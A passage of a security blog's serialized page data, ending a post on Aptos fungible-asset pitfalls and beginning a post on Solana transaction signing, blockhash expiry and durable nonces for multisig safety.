status of the primary fungible store is matched to that of the ",{"type":28,"tag":98,"props":67105,"children":67107},{"className":67106},[],[67108],{"type":33,"value":60747},{"type":33,"value":67110}," to ensure consistency.",{"type":28,"tag":65805,"props":67112,"children":67113},{},[67114,67133],{"type":28,"tag":29,"props":67115,"children":67116},{},[67117,67119,67124,67126,67131],{"type":33,"value":67118},"Could an attacker convert their ",{"type":28,"tag":98,"props":67120,"children":67122},{"className":67121},[],[67123],{"type":33,"value":60747},{"type":33,"value":67125}," to a primary fungible store and then register another ",{"type":28,"tag":98,"props":67127,"children":67129},{"className":67128},[],[67130],{"type":33,"value":60747},{"type":33,"value":67132}," only to convert it again to manipulate the \"frozen\" status of the linked primary fungible store?",{"type":28,"tag":65836,"props":67134,"children":67135},{"v-slot:answer-0":7},[67136],{"type":28,"tag":29,"props":67137,"children":67138},{},[67139],{"type":33,"value":67140},"The coin::register function first checks is_account_registered, which exits early if true. is_account_registered determines if the account has a primary fungible store for the linked fungible asset when the CoinStore doesn’t exist. If the fungible store has been converted, a primary fungible store and linked fungible asset will already exist, preventing re-registration.",{"type":28,"tag":63,"props":67142,"children":67143},{"id":2506},[67144],{"type":33,"value":2509},{"type":28,"tag":29,"props":67146,"children":67147},{},[67148,67150,67155],{"type":33,"value":67149},"Aptos's implementation of fungible assets does indeed resolve the original problems with ",{"type":28,"tag":98,"props":67151,"children":67153},{"className":67152},[],[67154],{"type":33,"value":60585},{"type":33,"value":141},{"type":28,"tag":29,"props":67157,"children":67158},{},[67159],{"type":33,"value":67160},"However, this solution comes with its own challenges, in part because of the numerous layers that interact with each other. Before using the fungible asset standard, it's important to understand these different APIs and potential pitfalls.",{"type":28,"tag":29,"props":67162,"children":67163},{},[67164,67166],{"type":33,"value":67165},"As a final exercise to the reader, how many different ways are there to withdraw a fungible asset?",{"type":28,"tag":15136,"props":67167,"children":67168},{},[67169],{"type":28,"tag":87,"props":67170,"children":67172},{"href":29279,"ariaDescribedBy":67171,"dataFootnoteRef":7,"id":29281},[15143],[67173],{"type":33,"value":1824},{"type":28,"tag":18085,"props":67175,"children":67177},{"className":67176,"dataFootnotes":7},[18088],[67178,67183],{"type":28,"tag":63,"props":67179,"children":67181},{"className":67180,"id":15143},[18093],[67182],{"type":33,"value":18096},{"type":28,"tag":455,"props":67184,"children":67185},{},[67186],{"type":28,"tag":459,"props":67187,"children":67188},{"id":30021},[67189,67191,67233],{"type":33,"value":67190},"There are at least four functions that can withdraw a fungible asset:",{"type":28,"tag":2108,"props":67192,"children":67193},{},[67194,67204,67213,67223],{"type":28,"tag":459,"props":67195,"children":67196},{},[67197],{"type":28,"tag":87,"props":67198,"children":67202},{"href":67199,"rel":67200,":style":67201},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/fungible_asset.move#L782",[91],"color: #007bff;",[67203],{"type":33,"value":63886},{"type":28,"tag":459,"props":67205,"children":67206},{},[67207],{"type":28,"tag":87,"props":67208,"children":67211},{"href":67209,"rel":67210,":style":67201},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/dispatchable_fungible_asset.move#L74",[91],[67212],{"type":33,"value":65826},{"type":28,"tag":459,"props":67214,"children":67215},{},[67216],{"type":28,"tag":87,"props":67217,"children":67220},{"href":67218,"rel":67219,":style":67201},"https://github.com/aptos-labs/aptos-core/blob/81a2f4268b9e0f25cb6e1ce5c28bba0a34c27604/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move#L157",[91],[67221],{"type":33,"value":67222},"primary_fungible_store::withdraw",{"type":28,"tag":459,"props":67224,"children":67225},{},[67226],{"type":28,"tag":87,"props":67227,"children":67230},{"href":67228,"rel":67229,":style":67201},"https://github.com/aptos-labs/aptos-core/blob/main/aptos-move/framework/aptos-framework/sources/coin.move#L1091-L1098",[91],[67231],{"type":33,"value":67232},"coin::withdraw",{"type":28,"tag":87,"props":67234,"children":67236},{"href":30049,"ariaLabel":18199,"className":67235,"dataFootnoteBackref":7},[18201],[67237],{"type":33,"value":18204},{"type":28,"tag":2516,"props":67239,"children":67240},{},[67241],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":67243},[67244,67245,67246,67249,67254,67255,67256,67257],{"id":60571,"depth":256,"text":60574},{"id":61116,"depth":256,"text":61119},{"id":61676,"depth":256,"text":61679,"children":67247},[67248],{"id":62187,"depth":293,"text":62190},{"id":62444,"depth":256,"text":62447,"children":67250},[67251,67252,67253],{"id":62487,"depth":293,"text":62490},{"id":63192,"depth":293,"text":63195},{"id":64850,"depth":293,"text":64853},{"id":65381,"depth":256,"text":65384},{"id":66362,"depth":256,"text":66365},{"id":2506,"depth":256,"text":2509},{"id":15143,"depth":256,"text":18096},"content:blog:2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets.md","blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets",{"_path":67262,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":67263,"description":67264,"date":67265,"author":5391,"image":67266,"isFeatured":19,"onBlogPage":19,"tags":67268,"body":67269,"_type":2534,"_id":69097,"_source":2536,"_file":69098,"_stem":69099,"_extension":2539},"/blog/2025-02-22-multisig-security","Solana Multisig Security","What can teams do if their multisig signers are compromised? We explore Solana's transaction signing model and present a procedure for safe signing in the presence of malicious signers on Solana.","2025-02-22",{"src":67267,"width":5056,"height":5057},"/posts/multisig-security/title.png",[2551],{"type":25,"children":67270,"toc":69088},[67271,67284,67290,67295,67301,67314,67322,67335,67395,67417,67544,67549,67562,67574,67580,67594,67607,67621,68103,68108,68116,68130,68144,68283,68295,68301,68306,68324,68329,68334,68355,68639,68654,68842,68855,68984,68989,68994,68999,69027,69033,69038,69052,69084],{"type":28,"tag":29,"props":67272,"children":67273},{},[67274,67275,67282],{"type":33,"value":16275},{"type":28,"tag":87,"props":67276,"children":67279},{"href":67277,"rel":67278},"https://www.securityalliance.org/news/2025-02-dprk-advisory",[91],[67280],{"type":33,"value":67281},"Bybit hack",{"type":33,"value":67283}," raises an interesting question: what can teams do if their signers are compromised?",{"type":28,"tag":63,"props":67285,"children":67287},{"id":67286},"solana-signatures",[67288],{"type":33,"value":67289},"Solana Signatures",{"type":28,"tag":29,"props":67291,"children":67292},{},[67293],{"type":33,"value":67294},"We first need to understand how Solana signatures work. There are two ways to sign a Solana transaction.",{"type":28,"tag":75,"props":67296,"children":67298},{"id":67297},"recent-blockhash",[67299],{"type":33,"value":67300},"Recent Blockhash",{"type":28,"tag":29,"props":67302,"children":67303},{},[67304,67306,67313],{"type":33,"value":67305},"The most straightforward is with a \"recent blockhash\". From ",{"type":28,"tag":87,"props":67307,"children":67310},{"href":67308,"rel":67309},"https://solana.com/developers/guides/advanced/confirmation",[91],[67311],{"type":33,"value":67312},"the docs",{"type":33,"value":4160},{"type":28,"tag":107,"props":67315,"children":67316},{},[67317],{"type":28,"tag":29,"props":67318,"children":67319},{},[67320],{"type":33,"value":67321},"During transaction processing, Solana Validators will check if each transaction's recent blockhash is recorded within the most recent 151 stored hashes (aka \"max processing age\"). If the transaction's recent blockhash is older than this max processing age, the transaction is not processed.",{"type":28,"tag":29,"props":67323,"children":67324},{},[67325,67327,67334],{"type":33,"value":67326},"The actual constant ",{"type":28,"tag":87,"props":67328,"children":67331},{"href":67329,"rel":67330},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/sdk/clock/src/lib.rs#L129-L130",[91],[67332],{"type":33,"value":67333},"is defined here",{"type":33,"value":141},{"type":28,"tag":234,"props":67336,"children":67338},{"className":2652,"code":67337,"language":2651,"meta":7,"style":7},"// The maximum age of a blockhash that will be accepted by the leader\npub const MAX_PROCESSING_AGE: usize = MAX_RECENT_BLOCKHASHES / 2;\n",[67339],{"type":28,"tag":98,"props":67340,"children":67341},{"__ignoreMap":7},[67342,67350],{"type":28,"tag":116,"props":67343,"children":67344},{"class":245,"line":246},[67345],{"type":28,"tag":116,"props":67346,"children":67347},{"style":250},[67348],{"type":33,"value":67349},"// The maximum age of a blockhash that will be accepted by the leader\n",{"type":28,"tag":116,"props":67351,"children":67352},{"class":245,"line":256},[67353,67357,67361,67366,67370,67374,67378,67383,67387,67391],{"type":28,"tag":116,"props":67354,"children":67355},{"style":376},[67356],{"type":33,"value":13356},{"type":28,"tag":116,"props":67358,"children":67359},{"style":376},[67360],{"type":33,"value":38732},{"type":28,"tag":116,"props":67362,"children":67363},{"style":266},[67364],{"type":33,"value":67365}," MAX_PROCESSING_AGE",{"type":28,"tag":116,"props":67367,"children":67368},{"style":370},[67369],{"type":33,"value":4160},{"type":28,"tag":116,"props":67371,"children":67372},{"style":339},[67373],{"type":33,"value":13397},{"type":28,"tag":116,"props":67375,"children":67376},{"style":370},[67377],{"type":33,"value":2226},{"type":28,"tag":116,"props":67379,"children":67380},{"style":266},[67381],{"type":33,"value":67382}," MAX_RECENT_BLOCKHASHES ",{"type":28,"tag":116,"props":67384,"children":67385},{"style":370},[67386],{"type":33,"value":4250},{"type":28,"tag":116,"props":67388,"children":67389},{"style":350},[67390],{"type":33,"value":7606},{"type":28,"tag":116,"props":67392,"children":67393},{"style":266},[67394],{"type":33,"value":384},{"type":28,"tag":29,"props":67396,"children":67397},{},[67398,67400,67407,67409,67415],{"type":33,"value":67399},"For those curious, the logic ",{"type":28,"tag":87,"props":67401,"children":67404},{"href":67402,"rel":67403},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L61",[91],[67405],{"type":33,"value":67406},"starts here",{"type":33,"value":67408}," and is quite straightforward to follow, ending in a ",{"type":28,"tag":98,"props":67410,"children":67412},{"className":67411},[],[67413],{"type":33,"value":67414},"is_hash_index_valid",{"type":33,"value":67416}," check.",{"type":28,"tag":234,"props":67418,"children":67420},{"className":2652,"code":67419,"language":2651,"meta":7,"style":7},"fn is_hash_index_valid(last_hash_index: u64, max_age: usize, hash_index: u64) -> bool {\n    last_hash_index - hash_index \u003C= max_age as u64\n}\n",[67421],{"type":28,"tag":98,"props":67422,"children":67423},{"__ignoreMap":7},[67424,67503,67537],{"type":28,"tag":116,"props":67425,"children":67426},{"class":245,"line":246},[67427,67431,67436,67440,67445,67449,67453,67457,67462,67466,67470,67474,67479,67483,67487,67491,67495,67499],{"type":28,"tag":116,"props":67428,"children":67429},{"style":376},[67430],{"type":33,"value":19930},{"type":28,"tag":116,"props":67432,"children":67433},{"style":282},[67434],{"type":33,"value":67435}," is_hash_index_valid",{"type":28,"tag":116,"props":67437,"children":67438},{"style":266},[67439],{"type":33,"value":313},{"type":28,"tag":116,"props":67441,"children":67442},{"style":272},[67443],{"type":33,"value":67444},"last_hash_index",{"type":28,"tag":116,"props":67446,"children":67447},{"style":370},[67448],{"type":33,"value":4160},{"type":28,"tag":116,"props":67450,"children":67451},{"style":339},[67452],{"type":33,"value":5531},{"type":28,"tag":116,"props":67454,"children":67455},{"style":266},[67456],{"type":33,"value":825},{"type":28,"tag":116,"props":67458,"children":67459},{"style":272},[67460],{"type":33,"value":67461},"max_age",{"type":28,"tag":116,"props":67463,"children":67464},{"style":370},[67465],{"type":33,"value":4160},{"type":28,"tag":116,"props":67467,"children":67468},{"style":339},[67469],{"type":33,"value":13397},{"type":28,"tag":116,"props":67471,"children":67472},{"style":266},[67473],{"type":33,"value":825},{"type":28,"tag":116,"props":67475,"children":67476},{"style":272},[67477],{"type":33,"value":67478},"hash_index",{"type":28,"tag":116,"props":67480,"children":67481},{"style":370},[67482],{"type":33,"value":4160},{"type":28,"tag":116,"props":67484,"children":67485},{"style":339},[67486],{"type":33,"value":5531},{"type":28,"tag":116,"props":67488,"children":67489},{"style":266},[67490],{"type":33,"value":1609},{"type":28,"tag":116,"props":67492,"children":67493},{"style":370},[67494],{"type":33,"value":13423},{"type":28,"tag":116,"props":67496,"children":67497},{"style":339},[67498],{"type":33,"value":11718},{"type":28,"tag":116,"props":67500,"children":67501},{"style":266},[67502],{"type":33,"value":1291},{"type":28,"tag":116,"props":67504,"children":67505},{"class":245,"line":256},[67506,67511,67515,67520,67524,67529,67533],{"type":28,"tag":116,"props":67507,"children":67508},{"style":272},[67509],{"type":33,"value":67510},"    last_hash_index",{"type":28,"tag":116,"props":67512,"children":67513},{"style":370},[67514],{"type":33,"value":50874},{"type":28,"tag":116,"props":67516,"children":67517},{"style":272},[67518],{"type":33,"value":67519}," hash_index",{"type":28,"tag":116,"props":67521,"children":67522},{"style":370},[67523],{"type":33,"value":7869},{"type":28,"tag":116,"props":67525,"children":67526},{"style":272},[67527],{"type":33,"value":67528}," max_age",{"type":28,"tag":116,"props":67530,"children":67531},{"style":376},[67532],{"type":33,"value":8500},{"type":28,"tag":116,"props":67534,"children":67535},{"style":339},[67536],{"type":33,"value":12863},{"type":28,"tag":116,"props":67538,"children":67539},{"class":245,"line":293},[67540],{"type":28,"tag":116,"props":67541,"children":67542},{"style":266},[67543],{"type":33,"value":406},{"type":28,"tag":29,"props":67545,"children":67546},{},[67547],{"type":33,"value":67548},"One important consequence is that any signed transaction has a natural expiration of around a few minutes.",{"type":28,"tag":107,"props":67550,"children":67551},{},[67552],{"type":28,"tag":29,"props":67553,"children":67554},{},[67555,67557],{"type":33,"value":67556},"Since slots (aka the time period a validator can produce a block) are configured to last about 400ms, but may fluctuate between 400ms and 600ms, ",{"type":28,"tag":4995,"props":67558,"children":67559},{},[67560],{"type":33,"value":67561},"a given blockhash can only be used by transactions for about 60 to 90 seconds before it will be considered expired by the runtime.",{"type":28,"tag":29,"props":67563,"children":67564},{},[67565,67567,67572],{"type":33,"value":67566},"This means an attacker ",{"type":28,"tag":2583,"props":67568,"children":67569},{},[67570],{"type":33,"value":67571},"must use",{"type":33,"value":67573}," a malicious signed transaction within a short timeframe.",{"type":28,"tag":75,"props":67575,"children":67577},{"id":67576},"durable-nonce",[67578],{"type":33,"value":67579},"Durable Nonce",{"type":28,"tag":29,"props":67581,"children":67582},{},[67583,67585,67592],{"type":33,"value":67584},"The second type of signature ",{"type":28,"tag":87,"props":67586,"children":67589},{"href":67587,"rel":67588},"https://solana.com/developers/guides/advanced/introduction-to-durable-nonces",[91],[67590],{"type":33,"value":67591},"is a durable nonce",{"type":33,"value":67593},". These were created to solve the very feature (or problem) mentioned above: short expiration time.",{"type":28,"tag":107,"props":67595,"children":67596},{},[67597],{"type":28,"tag":29,"props":67598,"children":67599},{},[67600,67602],{"type":33,"value":67601},"durable nonces provide an opportunity to create and sign a transaction that can be submitted at any point in the future, and much more. ",{"type":28,"tag":4995,"props":67603,"children":67604},{},[67605],{"type":33,"value":67606},"This opens up a wide range of use cases that are otherwise not possible or too difficult to implement",{"type":28,"tag":29,"props":67608,"children":67609},{},[67610,67612,67619],{"type":33,"value":67611},"If we examine the code ",{"type":28,"tag":87,"props":67613,"children":67616},{"href":67614,"rel":67615},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L104",[91],[67617],{"type":33,"value":67618},"for recent blockhash validation",{"type":33,"value":67620},", we can also see the handling for durable nonces.",{"type":28,"tag":234,"props":67622,"children":67624},{"className":2652,"code":67623,"language":2651,"meta":7,"style":7},"    let recent_blockhash = tx.message().recent_blockhash();\n    if let Some(hash_info) = hash_queue.get_hash_info_if_valid(recent_blockhash, max_age) {\n        Ok(CheckedTransactionDetails {\n            nonce: None,\n            lamports_per_signature: hash_info.lamports_per_signature(),\n        })\n    } else if let Some((nonce, previous_lamports_per_signature)) = self\n        .check_load_and_advance_message_nonce_account(\n            tx.message(),\n            next_durable_nonce,\n            next_lamports_per_signature,\n        )\n    {\n        Ok(CheckedTransactionDetails {\n            nonce: Some(nonce),\n            lamports_per_signature: previous_lamports_per_signature,\n        })\n    } else {\n        error_counters.blockhash_not_found += 1;\n        Err(TransactionError::BlockhashNotFound)\n    }\n",[67625],{"type":28,"tag":98,"props":67626,"children":67627},{"__ignoreMap":7},[67628,67675,67741,67761,67781,67811,67819,67873,67890,67910,67922,67934,67942,67949,67968,67995,68015,68022,68037,68067,68096],{"type":28,"tag":116,"props":67629,"children":67630},{"class":245,"line":246},[67631,67635,67640,67644,67649,67653,67658,67662,67666,67671],{"type":28,"tag":116,"props":67632,"children":67633},{"style":376},[67634],{"type":33,"value":2672},{"type":28,"tag":116,"props":67636,"children":67637},{"style":272},[67638],{"type":33,"value":67639}," recent_blockhash",{"type":28,"tag":116,"props":67641,"children":67642},{"style":370},[67643],{"type":33,"value":2226},{"type":28,"tag":116,"props":67645,"children":67646},{"style":272},[67647],{"type":33,"value":67648}," tx",{"type":28,"tag":116,"props":67650,"children":67651},{"style":370},[67652],{"type":33,"value":141},{"type":28,"tag":116,"props":67654,"children":67655},{"style":282},[67656],{"type":33,"value":67657},"message",{"type":28,"tag":116,"props":67659,"children":67660},{"style":266},[67661],{"type":33,"value":13545},{"type":28,"tag":116,"props":67663,"children":67664},{"style":370},[67665],{"type":33,"value":141},{"type":28,"tag":116,"props":67667,"children":67668},{"style":282},[67669],{"type":33,"value":67670},"recent_blockhash",{"type":28,"tag":116,"props":67672,"children":67673},{"style":266},[67674],{"type":33,"value":1445},{"type":28,"tag":116,"props":67676,"children":67677},{"class":245,"line":256},[67678,67682,67686,67690,67694,67699,67703,67707,67712,67716,67721,67725,67729,67733,67737],{"type":28,"tag":116,"props":67679,"children":67680},{"style":260},[67681],{"type":33,"value":11947},{"type":28,"tag":116,"props":67683,"children":67684},{"style":376},[67685],{"type":33,"value":26960},{"type":28,"tag":116,"props":67687,"children":67688},{"style":339},[67689],{"type":33,"value":26965},{"type":28,"tag":116,"props":67691,"children":67692},{"style":266},[67693],{"type":33,"value":313},{"type":28,"tag":116,"props":67695,"children":67696},{"style":272},[67697],{"type":33,"value":67698},"hash_info",{"type":28,"tag":116,"props":67700,"children":67701},{"style":266},[67702],{"type":33,"value":1609},{"type":28,"tag":116,"props":67704,"children":67705},{"style":370},[67706],{"type":33,"value":373},{"type":28,"tag":116,"props":67708,"children":67709},{"style":272},[67710],{"type":33,"value":67711}," hash_queue",{"type":28,"tag":116,"props":67713,"children":67714},{"style":370},[67715],{"type":33,"value":141},{"type":28,"tag":116,"props":67717,"children":67718},{"style":282},[67719],{"type":33,"value":67720},"get_hash_info_if_valid",{"type":28,"tag":116,"props":67722,"children":67723},{"style":266},[67724],{"type":33,"value":313},{"type":28,"tag":116,"props":67726,"children":67727},{"style":272},[67728],{"type":33,"value":67670},{"type":28,"tag":116,"props":67730,"children":67731},{"style":266},[67732],{"type":33,"value":825},{"type":28,"tag":116,"props":67734,"children":67735},{"style":272},[67736],{"type":33,"value":67461},{"type":28,"tag":116,"props":67738,"children":67739},{"style":266},[67740],{"type":33,"value":844},{"type":28,"tag":116,"props":67742,"children":67743},{"class":245,"line":293},[67744,67748,67752,67757],{"type":28,"tag":116,"props":67745,"children":67746},{"style":339},[67747],{"type":33,"value":14477},{"type":28,"tag":116,"props":67749,"children":67750},{"style":266},[67751],{"type":33,"value":313},{"type":28,"tag":116,"props":67753,"children":67754},{"style":339},[67755],{"type":33,"value":67756},"CheckedTransactionDetails",{"type":28,"tag":116,"props":67758,"children":67759},{"style":266},[67760],{"type":33,"value":1291},{"type":28,"tag":116,"props":67762,"children":67763},{"class":245,"line":361},[67764,67769,67773,67777],{"type":28,"tag":116,"props":67765,"children":67766},{"style":272},[67767],{"type":33,"value":67768},"            nonce",{"type":28,"tag":116,"props":67770,"children":67771},{"style":370},[67772],{"type":33,"value":4160},{"type":28,"tag":116,"props":67774,"children":67775},{"style":339},[67776],{"type":33,"value":27412},{"type":28,"tag":116,"props":67778,"children":67779},{"style":266},[67780],{"type":33,"value":3178},{"type":28,"tag":116,"props":67782,"children":67783},{"class":245,"line":387},[67784,67789,67793,67798,67802,67807],{"type":28,"tag":116,"props":67785,"children":67786},{"style":272},[67787],{"type":33,"value":67788},"            lamports_per_signature",{"type":28,"tag":116,"props":67790,"children":67791},{"style":370},[67792],{"type":33,"value":4160},{"type":28,"tag":116,"props":67794,"children":67795},{"style":272},[67796],{"type":33,"value":67797}," hash_info",{"type":28,"tag":116,"props":67799,"children":67800},{"style":370},[67801],{"type":33,"value":141},{"type":28,"tag":116,"props":67803,"children":67804},{"style":282},[67805],{"type":33,"value":67806},"lamports_per_signature",{"type":28,"tag":116,"props":67808,"children":67809},{"style":266},[67810],{"type":33,"value":3161},{"type":28,"tag":116,"props":67812,"children":67813},{"class":245,"line":400},[67814],{"type":28,"tag":116,"props":67815,"children":67816},{"style":266},[67817],{"type":33,"value":67818},"        })\n",{"type":28,"tag":116,"props":67820,"children":67821},{"class":245,"line":614},[67822,67826,67830,67834,67838,67842,67846,67851,67855,67860,67864,67868],{"type":28,"tag":116,"props":67823,"children":67824},{"style":266},[67825],{"type":33,"value":15440},{"type":28,"tag":116,"props":67827,"children":67828},{"style":260},[67829],{"type":33,"value":2986},{"type":28,"tag":116,"props":67831,"children":67832},{"style":260},[67833],{"type":33,"value":15449},{"type":28,"tag":116,"props":67835,"children":67836},{"style":376},[67837],{"type":33,"value":26960},{"type":28,"tag":116,"props":67839,"children":67840},{"style":339},[67841],{"type":33,"value":26965},{"type":28,"tag":116,"props":67843,"children":67844},{"style":266},[67845],{"type":33,"value":1599},{"type":28,"tag":116,"props":67847,"children":67848},{"style":272},[67849],{"type":33,"value":67850},"nonce",{"type":28,"tag":116,"props":67852,"children":67853},{"style":266},[67854],{"type":33,"value":825},{"type":28,"tag":116,"props":67856,"children":67857},{"style":272},[67858],{"type":33,"value":67859},"previous_lamports_per_signature",{"type":28,"tag":116,"props":67861,"children":67862},{"style":266},[67863],{"type":33,"value":2390},{"type":28,"tag":116,"props":67865,"children":67866},{"style":370},[67867],{"type":33,"value":373},{"type":28,"tag":116,"props":67869,"children":67870},{"style":376},[67871],{"type":33,"value":67872}," self\n",{"type":28,"tag":116,"props":67874,"children":67875},{"class":245,"line":631},[67876,67881,67886],{"type":28,"tag":116,"props":67877,"children":67878},{"style":370},[67879],{"type":33,"value":67880},"        .",{"type":28,"tag":116,"props":67882,"children":67883},{"style":282},[67884],{"type":33,"value":67885},"check_load_and_advance_message_nonce_account",{"type":28,"tag":116,"props":67887,"children":67888},{"style":266},[67889],{"type":33,"value":3133},{"type":28,"tag":116,"props":67891,"children":67892},{"class":245,"line":665},[67893,67898,67902,67906],{"type":28,"tag":116,"props":67894,"children":67895},{"style":272},[67896],{"type":33,"value":67897},"            tx",{"type":28,"tag":116,"props":67899,"children":67900},{"style":370},[67901],{"type":33,"value":141},{"type":28,"tag":116,"props":67903,"children":67904},{"style":282},[67905],{"type":33,"value":67657},{"type":28,"tag":116,"props":67907,"children":67908},{"style":266},[67909],{"type":33,"value":3161},{"type":28,"tag":116,"props":67911,"children":67912},{"class":245,"line":713},[67913,67918],{"type":28,"tag":116,"props":67914,"children":67915},{"style":272},[67916],{"type":33,"value":67917},"            next_durable_nonce",{"type":28,"tag":116,"props":67919,"children":67920},{"style":266},[67921],{"type":33,"value":3178},{"type":28,"tag":116,"props":67923,"children":67924},{"class":245,"line":750},[67925,67930],{"type":28,"tag":116,"props":67926,"children":67927},{"style":272},[67928],{"type":33,"value":67929},"            next_lamports_per_signature",{"type":28,"tag":116,"props":67931,"children":67932},{"style":266},[67933],{"type":33,"value":3178},{"type":28,"tag":116,"props":67935,"children":67936},{"class":245,"line":779},[67937],{"type":28,"tag":116,"props":67938,"children":67939},{"style":266},[67940],{"type":33,"value":67941},"        )\n",{"type":28,"tag":116,"props":67943,"children":67944},{"class":245,"line":796},[67945],{"type":28,"tag":116,"props":67946,"children":67947},{"style":266},[67948],{"type":33,"value":28842},{"type":28,"tag":116,"props":67950,"children":67951},{"class":245,"line":847},[67952,67956,67960,67964],{"type":28,"tag":116,"props":67953,"children":67954},{"style":339},[67955],{"type":33,"value":14477},{"type":28,"tag":116,"props":67957,"children":67958},{"style":266},[67959],{"type":33,"value":313},{"type":28,"tag":116,"props":67961,"children":67962},{"style":339},[67963],{"type":33,"value":67756},{"type":28,"tag":116,"props":67965,"children":67966},{"style":266},[67967],{"type":33,"value":1291},{"type":28,"tag":116,"props":67969,"children":67970},{"class":245,"line":898},[67971,67975,67979,67983,67987,67991],{"type":28,"tag":116,"props":67972,"children":67973},{"style":272},[67974],{"type":33,"value":67768},{"type":28,"tag":116,"props":67976,"children":67977},{"style":370},[67978],{"type":33,"value":4160},{"type":28,"tag":116,"props":67980,"children":67981},{"style":339},[67982],{"type":33,"value":26965},{"type":28,"tag":116,"props":67984,"children":67985},{"style":266},[67986],{"type":33,"value":313},{"type":28,"tag":116,"props":67988,"children":67989},{"style":272},[67990],{"type":33,"value":67850},{"type":28,"tag":116,"props":67992,"children":67993},{"style":266},[67994],{"type":33,"value":6408},{"type":28,"tag":116,"props":67996,"children":67997},{"class":245,"line":907},[67998,68002,68006,68011],{"type":28,"tag":116,"props":67999,"children":68000},{"style":272},[68001],{"type":33,"value":67788},{"type":28,"tag":116,"props":68003,"children":68004},{"style":370},[68005],{"type":33,"value":4160},{"type":28,"tag":116,"props":68007,"children":68008},{"style":272},[68009],{"type":33,"value":68010}," previous_lamports_per_signature",{"type":28,"tag":116,"props":68012,"children":68013},{"style":266},[68014],{"type":33,"value":3178},{"type":28,"tag":116,"props":68016,"children":68017},{"class":245,"line":981},[68018],{"type":28,"tag":116,"props":68019,"children":68020},{"style":266},[68021],{"type":33,"value":67818},{"type":28,"tag":116,"props":68023,"children":68024},{"class":245,"line":1011},[68025,68029,68033],{"type":28,"tag":116,"props":68026,"children":68027},{"style":266},[68028],{"type":33,"value":15440},{"type":28,"tag":116,"props":68030,"children":68031},{"style":260},[68032],{"type":33,"value":2986},{"type":28,"tag":116,"props":68034,"children":68035},{"style":266},[68036],{"type":33,"value":1291},{"type":28,"tag":116,"props":68038,"children":68039},{"class":245,"line":1029},[68040,68045,68049,68054,68059,68063],{"type":28,"tag":116,"props":68041,"children":68042},{"style":272},[68043],{"type":33,"value":68044},"        error_counters",{"type":28,"tag":116,"props":68046,"children":68047},{"style":370},[68048],{"type":33,"value":141},{"type":28,"tag":116,"props":68050,"children":68051},{"style":266},[68052],{"type":33,"value":68053},"blockhash_not_found ",{"type":28,"tag":116,"props":68055,"children":68056},{"style":370},[68057],{"type":33,"value":68058},"+=",{"type":28,"tag":116,"props":68060,"children":68061},{"style":350},[68062],{"type":33,"value":4192},{"type":28,"tag":116,"props":68064,"children":68065},{"style":266},[68066],{"type":33,"value":384},{"type":28,"tag":116,"props":68068,"children":68069},{"class":245,"line":1038},[68070,68074,68078,68083,68087,68092],{"type":28,"tag":116,"props":68071,"children":68072},{"style":339},[68073],{"type":33,"value":14519},{"type":28,"tag":116,"props":68075,"children":68076},{"style":266},[68077],{"type":33,"value":313},{"type":28,"tag":116,"props":68079,"children":68080},{"style":339},[68081],{"type":33,"value":68082},"TransactionError",{"type":28,"tag":116,"props":68084,"children":68085},{"style":370},[68086],{"type":33,"value":3151},{"type":28,"tag":116,"props":68088,"children":68089},{"style":339},[68090],{"type":33,"value":68091},"BlockhashNotFound",{"type":28,"tag":116,"props":68093,"children":68094},{"style":266},[68095],{"type":33,"value":2830},{"type":28,"tag":116,"props":68097,"children":68098},{"class":245,"line":1047},[68099],{"type":28,"tag":116,"props":68100,"children":68101},{"style":266},[68102],{"type":33,"value":3025},{"type":28,"tag":29,"props":68104,"children":68105},{},[68106],{"type":33,"value":68107},"The documentation does a good job of explaining how they work.",{"type":28,"tag":107,"props":68109,"children":68110},{},[68111],{"type":28,"tag":29,"props":68112,"children":68113},{},[68114],{"type":33,"value":68115},"Durable Transaction Nonces, which are 32-byte in length (usually represented as base58 encoded strings), are used in place of recent blockhashes to make every transaction unique (to avoid double-spending) while removing the mortality on the unexecuted transaction.",{"type":28,"tag":29,"props":68117,"children":68118},{},[68119,68121,68128],{"type":33,"value":68120},"Durable nonces are created and managed ",{"type":28,"tag":87,"props":68122,"children":68125},{"href":68123,"rel":68124},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/programs/system/src/system_processor.rs#L446",[91],[68126],{"type":33,"value":68127},"by the system program",{"type":33,"value":68129},". They don't have a fixed PDA, so each account can have multiple associated nonces.",{"type":28,"tag":29,"props":68131,"children":68132},{},[68133,68135,68142],{"type":33,"value":68134},"After a durable nonce is used, it'll be \"advanced\" to preventing replay attacks. The new nonce is calculated ",{"type":28,"tag":87,"props":68136,"children":68139},{"href":68137,"rel":68138},"https://github.com/anza-xyz/agave/blob/c1080de464cfb578c301e975f498964b5d5313db/runtime/src/bank/check_transactions.rs#L81",[91],[68140],{"type":33,"value":68141},"based on the current blockhash",{"type":33,"value":68143},", and cannot be predicted in advance.",{"type":28,"tag":234,"props":68145,"children":68147},{"className":2652,"code":68146,"language":2651,"meta":7,"style":7},"    let hash_queue = self.blockhash_queue.read().unwrap();\n    let last_blockhash = hash_queue.last_hash();\n    let next_durable_nonce = 